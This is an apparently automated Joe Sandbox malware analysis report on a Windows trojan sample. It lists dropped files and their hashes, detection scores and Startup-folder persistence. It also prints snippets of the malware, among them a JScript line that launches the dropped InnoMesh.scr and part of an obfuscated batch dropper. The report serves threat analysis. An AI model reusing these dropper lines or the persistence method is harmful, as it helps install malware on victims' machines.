Drops PE files with a suspicious file extension 22->71 73 Writes many files with high entropy 22->73 32 cmd.exe 2 22->32         started        47 C:\Users\user\AppData\Local\Temp\704579\u, data 26->47 dropped signatures12 process13 file14 39 C:\Users\user\AppData\...\InnoMesh.url, MS 32->39 dropped 35 conhost.exe 32->35         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ldqj18tn.exe66%ReversingLabsWin32.Trojan.Leonem
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr8%ReversingLabs
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif8%ReversingLabs
C:\Users\user\AppData\Local\Temp\Becoming0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    high
    zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.autoitscript.com/autoit3/Jldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344846466.0000000000319000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.2547902948.00000000002B9000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorldqj18tn.exefalse
          high
          https://www.autoitscript.com/autoit3/ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drfalse
            high
            No contacted IP infos
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1577511
            Start date and time:2024-12-18 14:41:49 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 21s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:23
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:ldqj18tn.exe
            Detection:MAL
            Classification:mal84.rans.expl.evad.winEXE@28/26@2/0
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 102
            • Number of non-executed functions: 300
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 173.222.162.55
            • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: ldqj18tn.exe
            TimeTypeDescription
            08:42:51API Interceptor3346x Sleep call for process: Organizational.pif modified
            08:43:07API Interceptor2396x Sleep call for process: InnoMesh.scr modified
            14:42:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            s-part-0035.t-0009.t-msedge.netDOC.exeGet hashmaliciousCryptbotBrowse
            • 13.107.246.63
            2.png.ps1Get hashmaliciousUnknownBrowse
            • 13.107.246.63
            1.png.ps1Get hashmaliciousUnknownBrowse
            • 13.107.246.63
            ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
            • 13.107.246.63
            kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
            • 13.107.246.63
            steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
            • 13.107.246.63
            random.exe.17.exeGet hashmaliciousScreenConnect ToolBrowse
            • 13.107.246.63
            steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
            • 13.107.246.63
            newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
            • 13.107.246.63
            IW9QNpidAN.exeGet hashmaliciousUnknownBrowse
            • 13.107.246.63
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\704579\Organizational.pifEO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
              RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                  PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                    l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                      duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                        pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                          c2.htaGet hashmaliciousXWormBrowse
                            c2.htaGet hashmaliciousXWormBrowse
                              c2.htaGet hashmaliciousXWormBrowse
                                C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrEO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                  RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                    S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                      PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                        l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                          duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                            pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                              c2.htaGet hashmaliciousXWormBrowse
                                                c2.htaGet hashmaliciousXWormBrowse
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):169
                                                    Entropy (8bit):4.717709271494144
                                                    Encrypted:false
                                                    SSDEEP:3:RiMIpGXIdPHo55wWAX+ZFk/iEkD5xAaUFJl2FZo5uWAX+ZFk/iEkD5xAaUFks:RiJBJHonwWDEnkDvxUFT2FywWDEnkDvU
                                                    MD5:034B9F8454315EE228D38BA208CD5E7A
                                                    SHA1:16681F9DF8D79108DDD7A5558CEC691E88F6C96B
                                                    SHA-256:C7C273802935E7FCA77E0983E58C1F96FD27CFD16DFB6F69EF76A8F4F6D1F047
                                                    SHA-512:5E3DDE199220DE1FF72CE94128E414EDC1DED1F70332537B1532D522D84DD289C5DBED897F83C4FED7FC67AE4DF30B718959D2A5F76130B266324E24FA0A6DDD
                                                    Malicious:true
                                                    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\InnoMesh.scr\" \"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\M\"")
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1177035
                                                    Entropy (8bit):7.999838432083651
                                                    Encrypted:true
                                                    SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                                    MD5:AB0020D503E99E956AB92579E6690327
                                                    SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                                    SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                                    SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):893608
                                                    Entropy (8bit):6.62028134425878
                                                    Encrypted:false
                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                    • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                    • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                    • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                    • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1177035
                                                    Entropy (8bit):7.999838432083651
                                                    Encrypted:true
                                                    SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                                    MD5:AB0020D503E99E956AB92579E6690327
                                                    SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                                    SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                                    SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):36299
                                                    Entropy (8bit):7.995142843999967
                                                    Encrypted:true
                                                    SSDEEP:768:hfbk8c2PiL7CZcLVF7u3yq2OvvRZ+4BKKMtwFMsKCWf+QJddWz6nHu:tSqZcv6yq2OvZJ52dIzd
                                                    MD5:48EEF161688B28BF638E0EC37DABB593
                                                    SHA1:DD30CC2936BD9BE8C977653FC8E0590A0A96D707
                                                    SHA-256:32873FBEC30BA467A770F8FA5D18AE9F5D30B383E1761036EC9CDF0491C9E57A
                                                    SHA-512:3C76F72DF956D71E79E6BFFF54D6A8FACEE0F6A41CE0D7CD564BBFBA48B1C381A49B3C61E91BCE6C84FE172C55C791CD65665E0D26E4F7356C4457B712A788C9
                                                    Malicious:true
                                                    Preview:...t.Pma....*..s.#$*,..yO....yo.+......d=..$?.c..>...I...3}.#..L7.......j.....l~.Up.b....j.F.]..}D...{.id........(PQcr.p.k3...~B.qmA..tn~C.c.vc....Pq....r...6y...c*W...2z..N4...0Qd2.P..C..S....9._..u......z.....x....93TX...Y.r).=..>..9I-!.\`.T.......6.@:.B...=M.....]..[Q...W.<.'.t.Z.pq...C....<.....-.{>...o.S..5@.ry..7~Z.E.....MY......._!.........lrE......u...45....._b.P...`(..,_.W. .}kE}.}x.>...1.....,:1......T...6M.C.i...lk..K.........M....EM#.xa$L.e...,.L{...;c...G\....a.3.VM...Xcq.L...6d..r[...Ff(..{..}..Mzpv..;..e*T.>..O.....4.I......(r...."....Q...H....J....e......|.eC)S}.^L....c...5n>.q9....p.......dv..-&.....<.^.....C...%...4..n.S..L.#......C.e. G...H..(....q...2.k."......(.h-Uc.4.k.e..wA..yO.1.@.#......I..g.............3V.[....,[U"4.w...X'T1...1n:../E.G... ...Z.YRL+*(.....^.9...W;5..c..1..N. k....D..<:.~@..>.].e.r!.....dz%.Q....7...:..s....0 ...R..Q#.......`..v+.._.....T.F. ....E....)!...].#...........%.....=.&..i."O.c........g....'...aB0
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                    Category:dropped
                                                    Size (bytes):93184
                                                    Entropy (8bit):7.998062404457295
                                                    Encrypted:true
                                                    SSDEEP:1536:oA8gnQiP6RbR5TZJHTPs1GZO7ktznBUDjnMTcWh3FFHkPFGUFcAw2xNhz:m3iPEhTPs1GZO7k1nwDMJ3Pkzcyp
                                                    MD5:73F15B295CA059461F4CCEA25DD9A56A
                                                    SHA1:0B2834B85A315A2417C7AB51842937F3AD2E34DD
                                                    SHA-256:CF1527A390FE3B945F60BA46F139D5EFCC8B20712A6388FE0FF99CAD6B661CF8
                                                    SHA-512:31A459460A7D1C65AFFE2E085AC3835BF2C40EF0112F3C11AD6821B56A452B1EA53F5BF31FE2C83DBDE689D381506E54729BC515DA8E8F86BF6AE1F0785DB0CE
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:.......;. !..t&.J".'.6.+....&{.z....$...9.3.p8i..;.76z.....y......+xuz......p..Q.p.Ub...&.h........P..4."...t..A`...".R....h.,.M/.4.`.....7ZW.bp...KE....)`........V.nFG.Z......Y7....[:($..Z%...m....Q.?.@.k"(.*...Q..e".).s....W|.HMR..^Vs..Z....k.`..J.fG.3 .t..:.4./;.....%...</.......y]@..0...../.?hw.....{x.g....A....|.0{.*.../.}O.P.:.n...{.vw^.v<z.Oiv(...49..1s...w<...gt..!b.t.XhM.?..<.8.U...m.i_I...hMNc..-.t.....Y=........"A.d...tvt.^..5T...G.8Y.u4%W..+..:..I..<.........Y..K.$!.?Y.....AA......;]..g...,..a.j....RlS..i.ll.F.FD.^.(7\x.]..!..:DP^..>.l=m.T..R.......:...aj.......$......3........_bh...sT-ar..b......gp....0MR.&.R....G92U.`"...[...8k..>(.'....R. .N8.y.....`.6.A.a....@....x..^...BQ/L.<...m....e...X...b......z...U..]...5x$.%..RK.S....a.R.5.z.A.F..$;6W...I.0..9.,....4%....u...m...RB.....@..`.(."Qj...e...s*..L.=o#4../.0.K.#Et.BQo..UX.....>..G.F.|#]..F..UE.L..M...C.I...x.%q.(.~.. d.Sj.#s9.n..w<...%.+,v.f...hZ..Z..'f$...l..A.9K.3...
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):94208
                                                    Entropy (8bit):7.997963539367384
                                                    Encrypted:true
                                                    SSDEEP:1536:Getdq5yUrLGdyN60kxmcPu37oudLvidDCG4jx3yF8+Z3v8jdUU1tq00toMT:GetdqnidyNdmRGc2L+CcF8+Z0xUU1tqX
                                                    MD5:75257307B8D4D5B354711B1AFB9807B9
                                                    SHA1:F61C1599DEA1E8BCA46CF7176F5C367FC6C682F9
                                                    SHA-256:7F34EA53E7774CE8455BF3EC2F6A38CA870740B05D866073ABF8738874212DE1
                                                    SHA-512:B1317965AADC83E85CE16A839FAD180AC2BF0356BA305D1D14D33E22ECE8B7980CB5C9543E40B5C6830F626749AC233E4C2CB6A925DC72A8F85C49BD5FD67BDC
                                                    Malicious:true
                                                    Preview:..<...!......\.....[.N8...X.{..?.Z%Z.z...... ..{.<$..2..........<....-..8.K...!..3G..5.Q..,.X0..2.\.....@......S...y......R>....."..n$r..?..[...gX(.P.D16Y..I.-.$........K....R.....|.#...w..[3?....y9YN.?.#..H\X.......d..k...29...../....+.v/....S...=....8..=.?||...a.M..g.1......+b.16.H.K..>....g.~.q9..z.[7\bG....2u1.n...(.....*.1...x.........%.S._.........V/.6..P..P6.G..Op.x(.1VvE.{..-.3."&=*.....]..@.Q.,...S..CmBh.(....&......#..|.u..).6S>..Y.u...wY@..R.w..4.A.W.]x.Q\.x.]y.m.'.S9.M....<K.. ..G9...-.x......d.xTk....~..>\H.....11..Zl..o......e....~.+$)...P.b.7..I...c..F.!.W.&.x..i..=..k{..=......dY!c......UJUX...'E..%.......-.`.ut..o..A.C/....c.u......:.Yp...\;..PTyw....ap.../C..r..OM(....t.........ft.h<...2...<.t7...?.G..c.....2.J...-"....[.#.^c....X.-G,.^2............VX....O.&.....(E:...M..h .+.).o.NG..........I.s.{......l.hWmt...5o.]..!W.">..:/rr.O...).... FE....1UC........t.rs..d...D.6.#V....k0.L...&&..g...,....w..`.[...w
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):96256
                                                    Entropy (8bit):7.998514868354388
                                                    Encrypted:true
                                                    SSDEEP:1536:IvdYLR3NuhKqrKEN3tMdLgN/AfOTtbxaKiA9G0FnCerGGg/WTEFiIeHrygOI+T:IvdeRq39Mpg+fO/7ieGACmgyEF8ZOx
                                                    MD5:C4E8EDFE5D08067625B63F23C2E8FB8A
                                                    SHA1:D76FA360F0FE278C791442E9208A591C86476AF3
                                                    SHA-256:B5638AA2E4141715075A21BA1D69D2E8B53E5CF055564C9E2B80E20A5340A766
                                                    SHA-512:1AB6204134558D8AA28D43E7B860B57FAC12DA3F653A34FB5892D9241B04E7CBFFF3B5F8F8C2623F7354D0F9DF1078B19532F64CBD029D2D32B4D17863BD345F
                                                    Malicious:true
                                                    Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):13560
                                                    Entropy (8bit):5.152446332556762
                                                    Encrypted:false
                                                    SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                                    MD5:D85FE4F4F91482191B18B60437C1944D
                                                    SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                                    SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                                    SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                                    Malicious:false
                                                    Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):13560
                                                    Entropy (8bit):5.152446332556762
                                                    Encrypted:false
                                                    SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                                    MD5:D85FE4F4F91482191B18B60437C1944D
                                                    SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                                    SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                                    SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                                    Malicious:false
                                                    Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                                    Process:C:\Users\user\Desktop\ldqj18tn.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):81920
                                                    Entropy (8bit):7.997721698642565
                                                    Encrypted:true
                                                    SSDEEP:1536:YReT3S6RaPlwij6WqGnCf/x9TkXGr8nwvp1aYzERXM7Wi:48hRGwlGS/8XGr8n2pBgXXi
                                                    MD5:7B60F0D191C0904F3F5BE40433D86F73
                                                    SHA1:E6B09A6670797332B8861FC93F44DA7CF224BBCB
                                                    SHA-256:AA1CC0C31C1C15CCFF224BA06596D8DEF6F510280F077BA201650F18B0D67D90
                                                    SHA-512:1D8FF33C53794E3467968F747172DBFDC362E99E24CE6652A0860FE4094D5A861ED2E2C307577FE033AF39836268BC6EF2CDB331AE8FB3B58F2FC7A3EBA257A8
                                                    Malicious:true
